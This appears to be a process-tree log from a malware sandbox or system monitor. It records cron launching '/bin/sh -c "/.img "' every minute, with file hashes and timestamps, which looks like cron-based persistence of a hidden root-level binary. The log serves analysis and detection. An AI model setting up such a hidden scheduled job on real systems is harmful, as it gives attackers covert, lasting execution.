                                                            Path:/usr/sbin/cron
                                                            Arguments:/usr/sbin/cron -f
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                            Start time (UTC):22:49:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:-
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                            Start time (UTC):22:49:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:-
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                            Start time (UTC):22:49:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/sh
                                                            Arguments:/bin/sh -c "/.img "
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                            Start time (UTC):22:49:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/sh
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                            Start time (UTC):22:49:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/systemd
                                                            Arguments:-
                                                            File size:1620224 bytes
                                                            MD5 hash:9b2bec7092a40488108543f9334aab75
                                                            Start time (UTC):22:49:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:/usr/sbin/cron -f
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                            Start time (UTC):22:50:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:-
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                            Start time (UTC):22:50:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:-
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                            Start time (UTC):22:50:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/sh
                                                            Arguments:/bin/sh -c "/.img "
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                            Start time (UTC):22:50:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/sh
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                            Start time (UTC):22:50:02
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/systemd
                                                            Arguments:-
                                                            File size:1620224 bytes
                                                            MD5 hash:9b2bec7092a40488108543f9334aab75
                                                            Start time (UTC):22:50:02
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:/usr/sbin/cron -f
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                            Start time (UTC):22:51:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:-
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                            Start time (UTC):22:51:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:-
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                            Start time (UTC):22:51:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/sh
                                                            Arguments:/bin/sh -c "/.img "
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                            Start time (UTC):22:51:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/sh
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                            Start time (UTC):22:51:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/systemd
                                                            Arguments:-
                                                            File size:1620224 bytes
                                                            MD5 hash:9b2bec7092a40488108543f9334aab75
                                                            Start time (UTC):22:51:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/cron
                                                            Arguments:/usr/sbin/cron -f
                                                            File size:55944 bytes
                                                            MD5 hash:2c82564ff5cc862c89392b061c7fbd59